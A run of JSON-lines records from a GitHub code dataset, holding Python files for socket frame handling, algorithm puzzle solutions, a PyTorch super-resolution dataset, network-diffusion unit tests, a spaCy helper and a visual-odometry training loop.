frame.setPayloadSize(len(msgPayload))\n frame.writeBytesToPayload(msgPayload)\n return frame\n\n def isMessageAvailable(self):\n self.extractRecevedData()\n\n for frame in self.frameReceveList:\n if frame.getType() == EthernetComm.JSONTYPE:\n return True\n return False\n\n def readJSon(self):\n self.extractRecevedData()\n for frame in self.frameReceveList:\n if frame.getType() == EthernetComm.JSONTYPE:\n self.frameReceveList.remove(frame)\n return json.loads(str(frame.getPayload().decode()))\n return None\n\n def isAlive(self):\n return self.isSocketAlive\n\n def closeConnection(self):\n self.sock.close()\n\n def sendFrame(self, frame):\n data = self.sock.send(frame.toBytes())\n\n","repo_name":"chameau5050/Handling-Gro","sub_path":"Application/Comm/EthernetComm.py","file_name":"EthernetComm.py","file_ext":"py","file_size_in_byte":2409,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"40021811108","text":"# 프로그래머스 등굣길\n\ndef solution(m, n, puddles):\n answer = 0\n dp = [[0 for _ in range(m+1)] for _ in range(n+1)] # 0 ~ m n까지 만들고 1부터 m n까지를 쓸거임.\n mod = 1000000007\n for v in puddles: # 웅덩이를 -1로 체크\n a,b = v\n dp[b][a] = -1\n\n dp[1][1] = 1 # 시작지점 0\n\n for i in range(1,n+1): # 1부터 n, m까지지\n for j in range(1,m+1):\n if(dp[i][j] == -1): # 웅덩이면 0으로 바꿔서 다음에 영향 안미치게해줌.\n dp[i][j] = 0\n else:\n dp[i][j] += (dp[i][j-1] + dp[i-1][j]) % mod # 1,1을 영향 안 받게 +=으로 해줌.\n\n return dp[n][m] % mod\n\nm= 4\nn = 3\npuddles = [[2,2]]\nprint(solution(4,3,puddles))","repo_name":"geonwoomun/AlgorithmStudy","sub_path":"programmers/level3/pro42898.py","file_name":"pro42898.py","file_ext":"py","file_size_in_byte":754,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"31964508060","text":"\"\"\"\nDataset file\n\"\"\"\nfrom pathlib import Path\nimport json\nimport random\nimport os\n\n# from matplotlib import pyplot as plt\nimport torch\nfrom torch.utils.data import Dataset\nfrom torchvision.transforms import Compose\nimport torch.nn.functional as F\nimport scipy.ndimage\nimport numpy as np\nfrom cutter import loader\nfrom skimage.transform import resize\n\n\nclass SrDataset(Dataset):\n \"\"\"Dataset class for loading large amount of image arrays data\"\"\"\n\n def __init__(self, root_dir, lognorm=False, test=False, hr=True):\n \"\"\"\n Args:\n root_dir (string): Directory with all the images.\n lognorm: True if we ar eusing log normalization\n test: True only for test dataset\n hr: Input is hr image, lr is computed, then True\n transform (callable, optional): Optional transform to be applied\n on a sample.\n \"\"\"\n self.root_dir = Path(root_dir).expanduser().resolve().absolute()\n self.datalist = list(self.root_dir.rglob(\"*.npy\"))\n self.lognorm = lognorm\n self.test = test\n self.hr = hr\n self.statlist = []\n for fname in self.datalist:\n file_path = Path(fname)\n stat_file = json.load(open(str(file_path.parent / \"stats.json\")))\n self.statlist.append(stat_file)\n print(\"Total number of data elements found = \", len(self.datalist))\n\n def __len__(self):\n return len(self.datalist)\n\n def __getitem__(self, idx):\n img_name = Path(self.datalist[idx])\n filename = os.path.basename(img_name)\n filename = filename.split('.')[0]\n stats = self.statlist[idx]\n if self.hr:\n hr_image = loader(img_name)\n if not self.test:\n if stats[\"std\"] <= 0.001:\n stats[\"std\"] = 1\n hr_image = Normalize()(hr_image, stats)\n \n if self.hr:\n lr_image = scipy.ndimage.zoom(scipy.ndimage.zoom(hr_image, 0.25), 4.0)\n else:\n lr_image = loader(img_name)\n hr_image = np.zeros_like(lr_image)\n if not self.test:\n sample = {\"lr\": lr_image, \"lr_un\": lr_image, \"hr\": hr_image, \"stats\": stats, \"file\": filename}\n transforms = Compose(\n [Rotate(), Transpose(), HorizontalFlip(), VerticalFlip(),\n Reshape(), ToFloatTensor()]\n )\n for i, trans in enumerate([transforms]):\n sample = trans(sample)\n else:\n lr_unorm = lr_image.copy()\n if stats[\"std\"] <= 0.001:\n stats[\"std\"] = 1\n lr_image = Normalize()(lr_image, stats)\n sample = {\"lr\": lr_image, \"lr_un\": lr_unorm, \"hr\": hr_image, \"stats\": stats, \"file\": filename}\n transforms = Compose(\n [Reshape(), ToFloatTensor()]\n )\n sample = transforms(sample)\n return sample\n\n\n\"\"\"\nif __name__ == \"__main__\":\n face_dataset = SrDataset(root_dir='../data')\n\n fig = plt.figure()\n\n for i in range(len(face_dataset)):\n sample = face_dataset[i]\n\n print(i, sample['hr'].shape, sample['stats'])\n\n ax = plt.subplot(1, 4, i + 1)\n plt.tight_layout()\n ax.set_title('Sample #{}'.format(i))\n ax.axis('off')\n plt.imshow(sample['lr'])\n\n if i == 3:\n plt.show()\n break\n\"\"\"\n\n\nclass Rotate:\n \"\"\"Rotate class rotates image array\"\"\"\n\n def __call__(self, sample):\n \"\"\"\n\n Parameters\n ----------\n sample: dictionary containing lr, hr and stats\n\n Returns\n -------\n sample: dictionary containing transformed lr and transformed hr\n \"\"\"\n for i in range(random.randint(0, 3)):\n sample[\"hr\"] = np.rot90(sample[\"hr\"])\n sample[\"lr\"] = np.rot90(sample[\"lr\"])\n\n return sample\n\n\nclass ToFloatTensor:\n \"\"\"This class is for converting the image array to Float Tensor\"\"\"\n\n def __call__(self, sample):\n \"\"\"\n Parameters\n ----------\n sample: dictionary containing lr, hr and stats\n\n Returns\n -------\n sample: dictionary containing transformed lr and transformed hr\n \"\"\"\n sample[\"hr\"] = np.ascontiguousarray(sample[\"hr\"])\n sample[\"lr\"] = np.ascontiguousarray(sample[\"lr\"])\n sample[\"hr\"] = torch.tensor(sample[\"hr\"], dtype=torch.float32)\n sample[\"lr\"] = torch.tensor(sample[\"lr\"], dtype=torch.float32)\n return sample\n\n\nclass Transpose:\n \"\"\"Transpose class calculates the transpose of the matrix\"\"\"\n\n def __call__(self, sample):\n \"\"\"\n\n Parameters\n ----------\n sample: dictionary containing lr, hr and stats\n\n Returns\n -------\n sample: dictionary containing transformed lr and transformed hr\n \"\"\"\n if random.randint(1, 10) > 5:\n sample[\"hr\"] = np.transpose(sample[\"hr\"])\n sample[\"lr\"] = np.transpose(sample[\"lr\"])\n\n return sample\n\nclass VerticalFlip:\n \"\"\"VerticalFlip class to probailistically return vertical flip of the matrix\"\"\"\n\n def __call__(self, sample):\n \"\"\"\n\n Parameters\n ----------\n sample: dictionary containing lr, hr and stats\n\n Returns\n -------\n sample: dictionary containing transformed lr and transformed hr\n \"\"\"\n if random.randint(1, 10) > 5:\n sample[\"hr\"] = np.flipud(sample[\"hr\"])\n sample[\"lr\"] = np.flipud(sample[\"lr\"])\n\n return sample\n\nclass HorizontalFlip:\n \"\"\"HorizontalFlip class to probailistically return horizontal flip of the matrix\"\"\"\n\n def __call__(self, sample):\n \"\"\"\n\n Parameters\n ----------\n sample: dictionary containing lr, hr and stats\n\n Returns\n -------\n sample: dictionary containing transformed lr and transformed hr\n \"\"\"\n if random.randint(1, 10) > 5:\n sample[\"hr\"] = np.fliplr(sample[\"hr\"])\n sample[\"lr\"] = np.fliplr(sample[\"lr\"])\n\n return sample\n\n\nclass Reshape:\n \"\"\"Reshaping tensors\"\"\"\n\n def __call__(self, sample):\n \"\"\"\n\n Parameters\n ----------\n sample: dictionary containing lr, hr and stats\n\n Returns\n -------\n sample: dictionary containing reshaped lr and reshaped hr\n \"\"\"\n width = sample[\"hr\"].shape[-1]\n sample[\"hr\"] = np.reshape(sample[\"hr\"], (1, -1, width))\n sample[\"lr\"] = np.reshape(sample[\"lr\"], (1, -1, width))\n sample[\"lr_un\"] = np.reshape(sample[\"lr_un\"], (1, -1, width))\n return sample\n\n\nclass Normalize:\n \"\"\"Normalizing the high resolution image using mean and standard deviation\"\"\"\n\n def __call__(self, hr_image, stats):\n \"\"\"\n\n Parameters\n ----------\n hr_image: high resolution image\n stats: containing mean and standard deviation\n\n Returns\n -------\n hr_image: returns normalized hr image\n \"\"\"\n return (hr_image - stats[\"mean\"]) / stats[\"std\"]\n","repo_name":"ahanagemini/active_learning_sr","sub_path":"sr/dataset.py","file_name":"dataset.py","file_ext":"py","file_size_in_byte":7043,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"18676986749","text":"import os\nimport unittest\nfrom tempfile import TemporaryDirectory\n\nimport networkx as nx\nimport pandas as pd\n\nfrom network_diffusion import MultilayerNetwork, Simulator\nfrom network_diffusion.models import DSAAModel\nfrom network_diffusion.simulator import Logger\nfrom network_diffusion.tests.models.test_dsaa_model import prepare_compartments\n\n\ndef prepare_logs():\n \"\"\"Prepare logs for tests of Logger class.\"\"\"\n return (\n {\n \"ill\": ((\"S\", 47), (\"I\", 30)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 9), (\"V\", 68)),\n },\n {\n \"ill\": ((\"S\", 38), (\"I\", 39)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 9), (\"V\", 68)),\n },\n {\n \"ill\": ((\"I\", 42), (\"S\", 35)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 9), (\"V\", 68)),\n },\n {\n \"ill\": ((\"I\", 49), (\"S\", 28)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 6), (\"V\", 71)),\n },\n {\n \"ill\": ((\"I\", 56), (\"S\", 21)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 6), (\"V\", 71)),\n },\n {\n \"ill\": ((\"I\", 58), (\"S\", 19)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n },\n {\n \"ill\": ((\"I\", 60), (\"S\", 17)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n },\n {\n \"ill\": ((\"I\", 65), (\"S\", 12)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n },\n {\n \"ill\": ((\"I\", 65), (\"S\", 12)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n },\n {\n \"ill\": ((\"I\", 67), (\"S\", 10)),\n \"aware\": ((\"A\", 69), (\"UA\", 8)),\n \"vacc\": ((\"UV\", 5), (\"V\", 72)),\n },\n )\n\n\nclass TestLogger(unittest.TestCase):\n \"\"\"Test class for MultilayerNetwork class.\"\"\"\n\n def setUp(self):\n \"\"\"Set up most common testing parameters.\"\"\"\n compartments, phenomena = prepare_compartments()\n self.phenomena = phenomena\n\n # init multilayer network from nx predefined network\n network = MultilayerNetwork.from_nx_layer(\n nx.les_miserables_graph(), [*phenomena.keys()]\n )\n self.network = network\n\n # init model\n self.model = DSAAModel(compartments)\n self.model.compartments.seeding_budget = {\n \"ill\": (65, 35, 0),\n \"aware\": (39, 61),\n \"vacc\": (13, 87),\n }\n\n experiment = Simulator(self.model, self.network)\n self.logs = experiment.perform_propagation(70)\n\n def test_plot(self):\n \"\"\"Check if visualisation is being stored.\"\"\"\n with TemporaryDirectory() as out_dir:\n self.logs.plot(True, out_dir)\n self.assertTrue(\n \"visualisation.png\" in os.listdir(out_dir),\n f\"After creating visualisation a gif file of name \"\n f\"visualisation.png in {out_dir} should be saved!\",\n )\n\n def test_report(self):\n \"\"\"Check if report function writes out all files that it should.\"\"\"\n with TemporaryDirectory() as out_dir:\n self.logs.report(visualisation=True, path=out_dir)\n exp_files = {\n \"ill_propagation_report.csv\",\n \"model_report.txt\",\n \"network_report.txt\",\n \"visualisation.png\",\n \"vacc_propagation_report.csv\",\n \"aware_propagation_report.csv\",\n \"local_stats.json\",\n }\n real_files = set(os.listdir(out_dir))\n self.assertEqual(\n real_files,\n exp_files,\n f\"Report function should produce following files: {exp_files},\"\n f\" but produced {real_files}\",\n )\n\n def test__convert_logs(self):\n \"\"\"Check if logs convention is done properly.\"\"\"\n raw_logs = prepare_logs()\n\n model_hyperparams = {\n \"ill\": (\"S\", \"I\", \"R\"),\n \"aware\": (\"UA\", \"A\"),\n \"vacc\": (\"UV\", \"V\"),\n }\n\n exp_ill = pd.DataFrame(\n {\n \"S\": {\n 0: 47,\n 1: 38,\n 2: 35,\n 3: 28,\n 4: 21,\n 5: 19,\n 6: 17,\n 7: 12,\n 8: 12,\n 9: 10,\n },\n \"I\": {\n 0: 30,\n 1: 39,\n 2: 42,\n 3: 49,\n 4: 56,\n 5: 58,\n 6: 60,\n 7: 65,\n 8: 65,\n 9: 67,\n },\n \"R\": {\n 0: 0,\n 1: 0,\n 2: 0,\n 3: 0,\n 4: 0,\n 5: 0,\n 6: 0,\n 7: 0,\n 8: 0,\n 9: 0,\n },\n }\n )\n exp_aware = pd.DataFrame(\n {\n \"UA\": {\n 0: 8,\n 1: 8,\n 2: 8,\n 3: 8,\n 4: 8,\n 5: 8,\n 6: 8,\n 7: 8,\n 8: 8,\n 9: 8,\n },\n \"A\": {\n 0: 69,\n 1: 69,\n 2: 69,\n 3: 69,\n 4: 69,\n 5: 69,\n 6: 69,\n 7: 69,\n 8: 69,\n 9: 69,\n },\n }\n )\n exp_vacc = pd.DataFrame(\n {\n \"UV\": {\n 0: 9,\n 1: 9,\n 2: 9,\n 3: 6,\n 4: 6,\n 5: 5,\n 6: 5,\n 7: 5,\n 8: 5,\n 9: 5,\n },\n \"V\": {\n 0: 68,\n 1: 68,\n 2: 68,\n 3: 71,\n 4: 71,\n 5: 72,\n 6: 72,\n 7: 72,\n 8: 72,\n 9: 72,\n },\n }\n )\n exp_logs_converted = {\n \"ill\": exp_ill,\n \"aware\": exp_aware,\n \"vacc\": exp_vacc,\n }\n\n logger = Logger(\"model\", \"network\")\n for i in raw_logs:\n logger.add_global_stat(i)\n\n self.assertEqual(\n logger._global_stats_converted,\n {},\n \"Before convertion of logs field 'stat' should be empty\",\n )\n\n logger.convert_logs(model_hyperparams)\n for phenomena, stat in logger._global_stats_converted.items():\n pd.testing.assert_frame_equal(\n exp_logs_converted[phenomena], stat, check_dtype=False\n )\n\n def test__add_log(self):\n \"\"\"Check if logs are being colledded proprely during simulation.\"\"\"\n raw_logs = prepare_logs()\n logger = Logger(\"model\", \"network\")\n\n lengths__raw_stats = [len(logger._global_stats)]\n for log in raw_logs:\n logger.add_global_stat(log)\n lengths__raw_stats.append(len(logger._global_stats))\n\n exp_lengths = [0, 1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n self.assertEqual(\n lengths__raw_stats,\n exp_lengths,\n f\"Lengths of '_raw_stats' field should be like {exp_lengths}, \"\n f\"got {lengths__raw_stats}.\",\n )\n\n\nif __name__ == \"__main__\":\n unittest.main(verbosity=2)\n","repo_name":"anty-filidor/network_diffusion","sub_path":"network_diffusion/tests/test_logger.py","file_name":"test_logger.py","file_ext":"py","file_size_in_byte":7991,"program_lang":"python","lang":"en","doc_type":"code","stars":11,"dataset":"github-code","pt":"75"} +{"seq_id":"26711954730","text":"# with open(\"file1.txt\") as file:\n# file1 = file.readlines()\n\n\n\n# with open(\"file2.txt\") as file:\n# file2 = file.readlines()\n\n\n\n# result = [int(num.strip()) for num in file1 if num in file2]\n\n# # Write your code above 👆\n\n# print(result)\n\n# sentence = \"What is the Airspeed Velocity of an Unladen Swallow?\"\n# # Don't change code above 👆\n\n# # Write your code below:\n# sentence_list = sentence.split()\n\n# result1 = {word:len(word) for word in sentence_list}\n\n# # word_amount = {word:}\n\n\n\n# print(result1)\n\n# weather_c = {\n# \"Monday\": 12,\n# \"Tuesday\": 14,\n# \"Wednesday\": 15,\n# \"Thursday\": 14,\n# \"Friday\": 21,\n# \"Saturday\": 22,\n# \"Sunday\": 24,\n# }\n# # 🚨 Don't change code above 👆\n\n\n# # Write your code 👇 below:\n# weather_f = {day:(temp * 9/5) + 32 for (day, temp) in weather_c.items()}\n\n\n# print(weather_f)\n\nstudent_dict = {\n \"student\": [\"Alex\", \"Beth\", \"Caroline\"],\n \"score\": [56, 76, 98]\n}\n\nimport pandas\nstudent_data_frame = pandas.DataFrame(student_dict)\nprint(student_data_frame)\n\n#Loop through data frame\n# for (key, value) in student_data_frame.items():\n# print(value)\n\n#Loop through rows of data frame\nfor (index, row) in student_data_frame.iterrows():\n if row.student == \"Alex\":\n print(row.score)\n\n","repo_name":"Btech31488/100DaysOfCode","sub_path":"Day26/day_26_exercise/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1279,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"10794283306","text":"import sys\ninput = sys.stdin.readline\n\nn, m = map(int,input().split())\nedge = [[sys.maxsize for _ in range(n)] for _ in range(n)]\nfor _ in range(m):\n a, b = map(int,input().split())\n edge[a-1][b-1] = 1\n edge[b-1][a-1] = 1\nfor k in range(n):\n edge[k][k] = 0\n for i in range(n):\n for j in range(n):\n edge[i][j] = min(edge[i][j], edge[i][k] + edge[k][j])\n\nanswer = sys.maxsize\nfirst, second = -1, -1\nfor i in range(n-1):\n for j in range(i+1, n):\n check = 0\n for k in range(n):\n check += min(edge[i][k], edge[j][k]) * 2\n if check >= answer:\n break\n if answer > check:\n answer = check\n first = i+1\n second = j+1\nprint(first, second, answer)","repo_name":"hyunjinee/Algorithm","sub_path":"solved.ac/python/21278.py","file_name":"21278.py","file_ext":"py","file_size_in_byte":762,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"75"} +{"seq_id":"33999721557","text":"#!/usr/bin/env python3\n#\n# This source code is licensed under the license found in the\n# LICENSE file in the root directory of this source tree.\n\n\nimport spacy\nimport pandas as pd\n\nmodel = spacy.load('en')\n\n\ndef sentence_df(sentence):\n \"\"\"Represent sentence as a dataframe to display nlp info\n\n Arguments:\n sentence (str)\n Returns:\n df (dataframe)\n \"\"\"\n doc = model(sentence)\n index, data = get_nlp_data(doc)\n df = pd.DataFrame(data=data, index=index)\n return df\n\n\ndef get_nlp_data(doc):\n \"\"\"Parses doc and returns nlp data in a dict\n\n Arguments: doc (spaCy doc)\n Returns: token (list), data (dict)\n \"\"\"\n token = [token for token in doc]\n dep = [token.dep_ for token in doc]\n lemma = [token.lemma_ for token in doc]\n is_stop = [token.is_stop for token in doc]\n is_alpha = [token.is_alpha for token in doc]\n shape = [token.shape_ for token in doc]\n tag = [token.tag_ for token in doc]\n\n nc = list(doc.noun_chunks)\n nc_flat = [token for chunk in nc for token in chunk]\n nc_bool = [token in nc_flat for token in doc]\n n_chunk = []\n for tok in token:\n if tok in nc_flat:\n for chunk in nc:\n if tok in chunk:\n n_chunk.append(chunk)\n else:\n n_chunk.append(None)\n\n data = {\n 'token': token,\n 'dep': dep,\n 'lemma': lemma,\n 'is_stop': is_stop,\n 'is_alpha': is_alpha,\n 'shape': shape,\n 'tag': tag,\n 'nc_bool': nc_bool,\n 'n_chunk': n_chunk\n }\n return token, data\n","repo_name":"mnguyenngo/nlpkit","sub_path":"nlpkit/sentence_df.py","file_name":"sentence_df.py","file_ext":"py","file_size_in_byte":1579,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"4863834062","text":"# Train and Test Loop Functions\r\n#!pip install tensorboard\r\n#from torch.utils.tensorboard import SummaryWriter\r\nimport time\r\nimport sys\r\nimport math\r\nimport torch\r\nfrom params import par\r\n#from datasets import training_data_pose, training_data_depth\r\nfrom utils import util\r\nfrom datatracker import datalogger, Hook\r\nimport wandb\r\n\r\nfrom torchviz import make_dot\r\n\r\n'''\r\n\r\n TODO:\r\n 1. Edit train loop to reflect D3VO (no ground truth, data shapes, number of samples, etc.)\r\n 2. Get tensorboard setup to see smaller images, depth, uncertainty, etc. in google colab\r\n\r\n Edited: 9/24/22\r\n'''\r\n'''\r\ndef train_loop(img_dir, train_file, training_data_pose, training_data_depth, \r\n posenet_model, depthnet_model, loss_fn, pose_optimizer, depth_optimizer,\r\n batch_size, writer, dataset_type):'\r\n'''\r\ndef train_loop(img_dir, train_file, training_data_pose, training_data_depth, \r\n posenet_model, depthnet_model, loss_fn, joint_optimizer,\r\n batch_size, writer, dataset_type):\r\n \r\n #curr_usage = float(torch.cuda.memory_allocated(par.device))\r\n #max_usage = float(torch.cuda.max_memory_allocated(par.device))\r\n #print(\"GPU Usage: \" + str(curr_usage/max_usage) + \"%\")\r\n\r\n # Initializations\r\n avg_train_loss = 0 # tracking train loss\r\n\r\n # Going through all of the training data\r\n idx = 0 # Index of source image batch in that folder\r\n\r\n # Starting Training Time\r\n training_t0 = time.time()\r\n \r\n c = 0 # c is now the index for the shuffled data\r\n batch = c\r\n \r\n # Training Mode\r\n depthnet_model.train() \r\n posenet_model.train()\r\n \r\n idx = 0\r\n # Read in data\r\n train_data_files = open(train_file,'r')\r\n train_list = train_data_files.readlines()\r\n train_data_files.close()\r\n # Shuffle data\r\n shuffled_list = util.shuffle_sequence(train_list)\r\n N = int(len(shuffled_list)/par.batch_size)\r\n #loss_grads = []\r\n \r\n #use_amp = True\r\n #scaler = torch.cuda.amp.GradScaler(enabled=use_amp) # For Tensor Cores ...\r\n for idx in range(N):\r\n \r\n print(\"c: \" + str(c)) # Stack index\r\n print(\"Batch # (Entire Dataset): \" + str(c) + \", \" + \"Batch Number: \" + str(idx))\r\n \r\n curr_usage = float(torch.cuda.memory_allocated(par.device))\r\n max_usage = float(torch.cuda.max_memory_allocated(par.device))\r\n print(\"GPU Usage: \" + str(100*curr_usage/max_usage) + \"%\")\r\n\r\n # Get Data for Training Iteration\r\n '''\r\n if par.use_stereo:\r\n random_pick = torch.randint(0,2,(1,)).item()\r\n if random_pick == 0:\r\n cam_view = \"left\"\r\n elif random_pick == 1:\r\n cam_view = \"right\"\r\n else:\r\n cam_view = \"left\"\r\n '''\r\n cam_view = \"left\"\r\n \r\n p_images = training_data_pose.__getitem__(idx, shuffled_list, cam_view)\r\n d_images = training_data_depth.__getitem__(idx, shuffled_list, cam_view)\r\n\r\n #p_images.float().to(par.device)\r\n #d_images.float().to(par.device)\r\n \r\n p_images[\"t\"].requires_grad = True\r\n #print(\"I_t grad: \" + str(p_images[\"t\"].requires_grad))\r\n p_images[\"t+1\"].requires_grad = True\r\n #print(\"I_t+1 grad: \" + str(p_images[\"t+1\"].requires_grad))\r\n p_images[\"t-1\"].requires_grad = True\r\n #print(\"I_t-1 grad: \" + str(p_images[\"t-1\"].requires_grad))\r\n d_images[\"t\"].requires_grad = True\r\n #print(\"D_t grad: \" + str(d_images[\"t\"].requires_grad))\r\n d_images[\"ts\"].requires_grad = True\r\n #print(\"D_ts grad: \" + str(d_images[\"ts\"].requires_grad))\r\n \r\n #p_images.requires_grad = True\r\n #d_images.requires_grad = True\r\n \r\n sample_idx = shuffled_list[batch_size*idx]\r\n #pose_subpath = ppaths[-1]\r\n \r\n # Prediction and Loss\r\n beta = par.beta\r\n \r\n # Intrinsic camera matrix\r\n intrinsic_mat = util.get_intrinsic_matrix(sample_idx, dataset_type) # 6/10/23 : Might need to normalize K (see monodepth github issues)\r\n util.update_intrinsics(intrinsic_mat)\r\n \r\n # Training and Loss\r\n \r\n depth_input = d_images[\"t\"]\r\n\r\n depth_block_out = depthnet_model(depth_input)\r\n depth_block_s1 = depth_block_out[('disp', 0)]\r\n depth_block_s2 = depth_block_out[('disp', 1)]\r\n depth_block_s3 = depth_block_out[('disp', 2)]\r\n depth_block_s4 = depth_block_out[('disp', 3)]\r\n\r\n # Dictionary of Scales\r\n scales = {'0':depth_block_s1,\r\n '1':depth_block_s2,\r\n '2':depth_block_s3,\r\n '3':depth_block_s4}\r\n #print(depth_block_s1.shape)\r\n # For Scaling\r\n depth_map_ = 1.0/100.0 + (1.0/1e-2 - 1.0/100.0) * depth_block_s1\r\n inv_depth_ = 1.0/depth_map_\r\n #inv_depth_ = depth_map_ \r\n mean_inv_depth = inv_depth_.mean(3,False).mean(2,False).reshape(par.batch_size,1)\r\n\r\n # Formerly in loss function\r\n pose_input = torch.cat((p_images[\"t-1\"], p_images[\"t\"]),1)\r\n #translation1, rotation1, a1, b1 = posenet_model(pose_input)\r\n translation1, rotation1 = posenet_model(pose_input)\r\n pose_6dof_t_minus_1_t = torch.cat((translation1*mean_inv_depth,rotation1),1).to(par.device)\r\n \r\n reverse_tensor = torch.cat((p_images[\"t+1\"], p_images[\"t\"]),1)\r\n #translation2, rotation2, a2, b2 = posenet_model(reverse_tensor)\r\n translation2, rotation2 = posenet_model(reverse_tensor)\r\n pose_6dof_t_t_plus_1 = torch.cat((translation2*mean_inv_depth,rotation2),1).to(par.device)\r\n \r\n #continue\r\n #depth_input = d_images[:,:3,:,:]\r\n # Always want to feed the left image in the stereo pair for either monocular or stereo case\r\n '''\r\n if par.use_stereo:\r\n if d_images[\"cam\"] == \"left\":\r\n depth_input = d_images[\"t\"]\r\n elif d_images[\"cam\"] == \"right\":\r\n depth_input = d_images[\"ts\"]\r\n else:\r\n depth_input = d_images[\"t\"]\r\n '''\r\n \r\n '''\r\n depth_input = d_images[\"t\"]\r\n \r\n depth_block_out = depthnet_model(depth_input)\r\n depth_block_s1 = depth_block_out[('disp', 0)]\r\n #depth_block_s2 = depth_block_out[('disp', 1)]\r\n #depth_block_s3 = depth_block_out[('disp', 2)]\r\n #depth_block_s4 = depth_block_out[('disp', 3)]\r\n \r\n # Dictionary of Scales\r\n scales = {'0':depth_block_out[('disp', 3)],\r\n '1':depth_block_out[('disp', 2)],\r\n '2':depth_block_out[('disp', 1)],\r\n '3':depth_block_s1}\r\n '''\r\n\r\n '''\r\n if par.use_stereo:\r\n if d_images[\"cam\"] == \"left\":\r\n # Right Cam to Left Cam\r\n stereo_baseline = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:]\r\n elif d_images[\"cam\"] == \"right\":\r\n # Left Cam to Right Cam\r\n stereo_base = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:]\r\n # Inverse\r\n Rs = stereo_base[:3,:3]\r\n trans = stereo_base[:,3].view(3,1)\r\n stereo_baseline = torch.cat((torch.t(Rs),torch.matmul(-1*torch.t(Rs),trans)),1)\r\n else:\r\n stereo_baseline = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:]\r\n #print(stereo_baseline)\r\n '''\r\n stereo_baseline = util.get_stereo_baseline_transformation(sample_idx, dataset_type)[:3,:].to(par.device)\r\n '''\r\n if par.use_ab:\r\n a = [a1, a2]\r\n b = [b1, b2]\r\n else:\r\n a = []\r\n b = []\r\n '''\r\n a = []\r\n b = []\r\n #continue\r\n # The memory leak is in the loss function (use continue and monitor memory usage)\r\n loss = loss_fn(p_images,\r\n d_images,\r\n scales,\r\n stereo_baseline,\r\n intrinsic_mat,\r\n pose_6dof_t_minus_1_t,\r\n pose_6dof_t_t_plus_1,\r\n a,\r\n b,\r\n beta,\r\n idx,\r\n dataset_type).float().to(par.device)\r\n \r\n #continue\r\n # Training Loss To Tensorboard\r\n #writer.add_scalar(\"Training Loss\",loss,batch)\r\n \r\n #if idx == 0:\r\n # make_dot(loss,params=dict(loss_fn.named_parameters()))\r\n\r\n # Backpropagation\r\n joint_optimizer.zero_grad()\r\n loss.backward()\r\n \r\n #if idx == 0:\r\n # make_dot(loss,params=dict(loss_fn.named_parameters()))\r\n\r\n if math.isnan(loss):\r\n sys.exit(\"Loss is NaN ...\")\r\n \r\n #if (batch%5) == 0:\r\n joint_optimizer.step()\r\n \r\n a1 = 1.0\r\n b1 = 0.0\r\n inv_depth = 1.0/100.0 + (1.0/1e-2 - 1.0/100.0) * depth_block_s1\r\n inv_depth = 1.0/inv_depth\r\n mean_inv_depth = inv_depth.mean(3,False).mean(2,False).reshape(par.batch_size)\r\n #print(mean_inv_depth.shape)\r\n util.print_regression_progress(img_dir,pose_6dof_t_minus_1_t, mean_inv_depth,\r\n a1, b1, sample_idx, dataset_type)\r\n loss_, current = loss.item(), batch \r\n avg_train_loss += loss_ # Summing train loss to average later\r\n \r\n wandb.log({\"current_train_loss\": loss})\r\n print(f\"loss: {loss:>7f} [{current+1:>5d}/{int(N):>5d}]\") # formerly n/batch_size instead of epoch_size\r\n training_t1 = time.time()\r\n training_tn = util.time_stamp(training_t0, training_t1)\r\n print(\"Total Elapsed Time for Training: \" + training_tn) \r\n idx += 1\r\n c += 1\r\n batch += 1\r\n\r\n # Edited 9-24\r\n #del p_images, d_images, depth_input, pose_input, reverse_tensor, scales\r\n #print(torch.cuda.memory_summary(par.device))\r\n\r\n #del loss, loss_, p_images, d_images, depth_input, pose_input, reverse_tensor, scales, inv_depth, mean_inv_depth, depth_block_s1, depth_block_out\r\n \r\n #print(torch.cuda.mem_get_info(par.device))\r\n #torch.cuda.empty_cache()\r\n print(\"Total Memory Allocated by Tensors: \" + str(torch.cuda.max_memory_allocated()/1e9) + \" (GB)\")\r\n\r\n avg_train_loss = avg_train_loss / batch\r\n print(f\"Avg. Train loss: {avg_train_loss:>8f} \\n\")\r\n \r\n #del p_images, pose_input\r\n #del d_images, depth_input, depth_block_out, depth_block_s1, depth_block_s2, \r\n #depth_block_s3, depth_block_s4\r\n #del loss\r\n \r\n return avg_train_loss \r\n","repo_name":"dwalt123/D3VO-unofficial","sub_path":"train.py","file_name":"train.py","file_ext":"py","file_size_in_byte":10719,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"75"} +{"seq_id":"43693263067","text":"# There are N number of baskets, where the ith basket contains input2[i] apples.\n# We want to move apples between baskets so that all baskets have the same number of apples. What is the minimun number of apples that must be\n# moved?\n# It is guranteed that there exists a way to move apples so as to have an equal number of apples in 